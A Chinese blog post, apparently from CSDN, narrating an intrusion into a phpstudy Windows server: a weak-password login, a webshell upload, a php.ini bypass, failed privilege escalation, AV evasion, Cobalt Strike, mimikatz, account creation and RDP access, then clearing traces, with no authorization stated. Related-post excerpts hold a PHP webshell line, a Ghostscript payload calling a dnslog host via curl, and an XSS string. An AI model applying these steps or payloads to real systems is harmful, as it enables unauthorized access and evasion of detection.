记录一次渗透的思路

最新推荐文章于 2024-07-22 12:01:57 发布
最新推荐文章于 2024-07-22 12:01:57 发布
阅读量303 收藏
点赞数 2
分类专栏: WEB实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39780111/article/details/110184430
版权

信息收集就略过了。。。

在这里插入图片描述

尝试弱口令成功进入后台。。 弱口令简直就是 0day啊!!!
在这里插入图片描述
后台界面。。
进到后台就要getshell,找到上传点,burp改包成功上传冰蝎
在这里插入图片描述
拼接url地址访问在这里插入图片描述
成功连接,环境是phpstudy搭建的,windows2012的服务器在这里插入图片描述
系统函数都被禁用,执行不了命令,突破:
phpstudy搭建的环境权限都很大,可以跨目录,直接修改php.ini配置文件
成功执行命令:whoami
在这里插入图片描述
是个管理员权限,接下来就是重头戏了,本人在这里翻车了。。。
提权试了许多方法,奈何我太菜了。。
在这里插入图片描述
提权思路:
1、exp提权
2、数据库提权:udf、mof

找到数据库配置文件,拿到root密码,Mysql还开启了外联
在这里插入图片描述
在这里插入图片描述
UDF提权失败。。。在这里插入图片描述
下面还是用exp提权吧。。查看系统补丁情况,打了150多个补丁。。。。在这里插入图片描述
在目录中查看到补丁文件。。
在这里插入图片描述
EXP执行都不成功,原因:
1:安装有杀软(找免杀)
2:exp都安装有补丁(是否还遗漏没打的补丁?)
3:自己太菜!!
在这里插入图片描述

在这里插入图片描述
研究免杀,学习了一周。。。重新来过,不能放弃在这里插入图片描述
免杀在本地测试成功过360在这里插入图片描述
执行成功上线!在这里插入图片描述
在cs上在尝试提权,但是都失败了。。。
用猕猴桃dump hash,administrator的是为:空?
无奈
在这里插入图片描述
退一步。。。创建账号成功在这里插入图片描述
成功3389登上服务器。。。在这里插入图片描述
最后测试也提权不了。。。。清理痕迹还原。。。淦淦淦
在这里插入图片描述

总结与思路:
过程:
信息收集——登录系统——getshell——提权

在渗透的过程中每个阶段该做什么事,相信你们已经了解了,细节的地方就是如果找不到突破口了该怎么做? 多看看别人的思路吧0.0.

问题:主要问题还是集中在提权的时候
思考:
1、UDF提权失败?
查看报错信息,查阅资料都说是 plugin 路径UDF有问题,可是反复检查过了。。始终没有找到问题的关键。
2、自己收藏的EXP都失效?
3、其它方法?

各位师傅有方法可以跟我讨论讨论。。。毕竟我只有菜。。。

派大李0.0
关注
专栏目录
对某小程序的一次渗透记录
布啦啦
03-25 665
最近报了一个驾校,然后在报名回家以后,就开始疯狂的挂科目一的时长,突然想到这个小程序会不会存在漏洞呢,如果发现了,还可以去CNVD(https://www.cnvd.org.cn/)报一下,一是拿个积分,二是间接修复一下漏洞,毕竟自己的所有信息都在这个小程序里,不想自己有一天因为它存在什么漏洞,导致自己的信息被人偷走,所以本着保护自己的原则,我开始了一次【试探】。具体是哪个小程序,这里我就不说啦,漏洞已经报到CNVD了,写本文只是做一个分享。
记录一次渗透测试算命网站
c2788602731的博客
01-29 471
群友制作了一个小网站,让我们进行测试,查找数据库或者服务器,谁能进去谁就赢,当时我心想,这个时候怎么能少了我呢,二话不说答应了,头一次在别人面前表演。。。。 这种样式的站点我见过好多了,既然是测试,那就大胆的干! 第一步就不进行搜集了,这种数据库很明显就是MySQL,而且后台还是login那种,省略掉 ———————————————————————— 第一个思路:判断交互 打开登录页面,随便填个账号和密码 打开F12确定一下 点击登录以后提示重试,没错,这位群友真谨慎,居然设置了无论是管理员还是普通用
渗透实例】记录一次XSS渗透过程
TeamsSix 的 CSDN 空间
07-03 2382
0x01 找到存在XSS的位置 没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。 [外链图片转存失败(img-qUL3DxC1-1562166261579)(https://mp.csdn.net/mdeditor/1)] 0x02 构造XSS代码连接到XSS平台 XSS平台给我们的XSS代码是这样的: </tExt...
记录一次模拟渗透
0verWatch的博客
07-25 583
前言 今天还模拟了一次真实的挖洞过程,今天这网站一共有三个漏洞(都是要经过提醒才能弄出来),因为是搭的环境,简单记录一下思路,顺便当个回顾,源码啥的都没有了,耍完就要求删掉了。 正文 这台服务器有个前提就是跟我们一个网段的服务器,并且开了IIS服务,但是前提我们是不知道他的ip的,这个时候我们需要用一下nmap来扫一下同一网段下的ip nmap -sP -PI -PT 192.16...
一次渗透测试实战记录
最新发布
Locosomnus的博客
07-22 683
记录一下,只是记录一下
记录一次渗透测试全过程
weixin_30730151的博客
12-18 609
一、信息收集:   1、巡风扫漏洞看到一个80端口开放,上去看一看,任意文件上传。   2、巡风扫漏洞还看到一个phpmyadmin弱口令,版本很老。 二、任意文件上传:   1、上传php文件:  <?php @system($_GET("cmd")) ?> /* 合理合法过程要接受检查,不然还是传post,默认不记日志 上传路径在下载页面可以爆出...
记录一次常规的渗透测试
我想做一个好人<svg/onload=Alert`1`>(
06-01 428
首先是魔图漏洞 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops 然后windows下载后门。 方法1:certutil.exe -urlca
【萌新】记录一次渗透小站的过程
Leep0rt的博客
09-07 1003
一开始接触该站 先随便翻阅了一些目录 发现在URL中 “/ProductView.asp?ID=1021    ” 这几个字段格外引人瞩目 于是 二话不说 看看有没有注入点 输入一个  '  看一看  发现报错了!!! 然后惯例 and 1=1, and 1=11 发现存在云锁   突然想起来云锁存在一个绕过的漏洞 具体什么的百度一下看看吧! 云锁s
一次曲折而又有趣的渗透R3start1
08-03
【记一次曲折而又有趣的渗透R3start1】这篇文章记录了一位网络安全专家进行渗透测试的历程,涉及了网络协议、.NET和Apache等技术领域。在这个过程中,作者遇到多个挑战,经历了多次尝试和失败,最终成功获取了目标...
web渗透思路
天威一号
11-07 539
渗透思路如下: 0x01信息收集: 目前实战过了两次,越来越能意识到信息收集对渗透测试工作的重要性,web渗透不是仅仅局限于用公开漏洞的EXP直接打过去,还有很多“野路子”可以使用。 ①nmap扫描开放端口,常用端口如下: 21——-FTP服务 22——-SSH 23——-Telnet 25——-SMTP 80——-HTTP 443—–HTTPS 1433—–SQL server Oracle—...
渗透测试记录
denghan9435的博客
03-16 180
ps aux 查看当前进程 service postgresql start 没回显是正常的,没报错说明启动成功 win8.1企业版 64位下 无法上传文件到c盘根目录 d盘根目录可以 转载于:https://www.cnblogs.com/kinome/p/8581645.html...
渗透测试全过程记录
12-04
我先感慨一下,在做网络安全这些年感觉一直在漂,从05年刚到北京的远东到08年的大连,再到11年的启明,没有一个地方能让人感到是在踏实的做安全,对网络安全人才这块也都不重视。从圈内群的好友里得知,有很多技术水平很不错的朋友都闲置在家,为什么?我感觉国内的大环境都是这样的,所以出现了2011年底的各大网站密码泄露事件。我认为,泄露的那些库也只是九牛之一毛。在这个拿网络安全人才当民工的时代,也许这个事件算是给那些高傲的、高薪的程序员上的一堂课吧。
记录一次web渗透测试篇
m0_47421272的博客
01-07 2937
** 刚学web渗透2个月 第一次实战。 ** 渗透利用的工具: 1.dirb 2.nmap 开始 朋友发给我一个链接,点进去看是一个后台 尝试弱口令登录.(user:admin pass:admin) 非常幸运,登录进了后台。 找上传点上传webshell。 这里上传没有格式限制。 上传webshell。可以上传成功。 右键复制链接地址。 使用weevely连接。 发现后缀没显示,应该过滤掉了,本人比较懒,webshell上传失败了。 那就使用dirb扫描该站点目录,看看有没有敏感目录。
一次渗透
cxk
08-12 753
注入 1)网站首页 2)简单and 1=1 ,1=2判断注入点 3)order by 确定字段数为9,显示位union select 1,2…判断为4和8 4)判断权限 root权限,思考使用into outfile直接写shell或者是外联数据库,使用日志getshell 5)into outfile写shell。判断mysql版本为5.5,既必须查看secure-file-priv导...
实战渗透--一次对后台登录系统的简单渗透测试
tzyyyyyy的博客
11-25 4722
记录一次网页后台登录系统的渗透测试实战 拿到目标后台的管理员登录密码 以管理员身份进入后台
一次渗透经历
wuliyouMaozhi的博客
08-31 526
每一个参数都有可能是我们渗透成功的利刃,不要因为个别参数不行而放弃所有参数。
Metasploit 渗透练习记录
V1ZkRA的博客
07-28 127
Metasploit 渗透练习记录
记录自己的渗透学习——01
qq_38117786的博客
07-02 781
环境搭建所需 1.SLmail5.5 2.ImmunityDebugger 3.mona.py(可在github下载) 使用系统环境: Contorl:kali_linux victim:xp_sp3纯净版 开始测试 0x00在xp中安装slmail服务器 一路到底进行安装就行,记得随便设置一个例如lab.com的地址 一路next后到了选择虚拟机名字处,选择自己的虚拟机 ...
今天的一次渗透
chiqu8683的博客
09-07 109
这次渗透没有什么亮点,主要就是SQLMAP。这玩意很给力。直接给干掉了。。。 2005 sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --dbs --threads 10 2006 sqlmap -u "http://xxx...
如何成功实现一次渗透测试
04-15
如果你想在网络中执行渗透测试,你需要首先确定你的目标是什么。一旦你找到了目标系统,你可能需要使用漏洞扫描工具来寻找系统中已知的漏洞。如果你找到了漏洞,你可以通过利用漏洞来获取对系统的访问权限。在实际的实施过程中,你可能需要一些专业的工具和技术,如密码爆破、社交工程和漏洞利用等。最关键的是,你需要确保你已经经过授权并拥有完整的许可证,这样你才能进行渗透测试,否则你可能会面临严重的法律问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值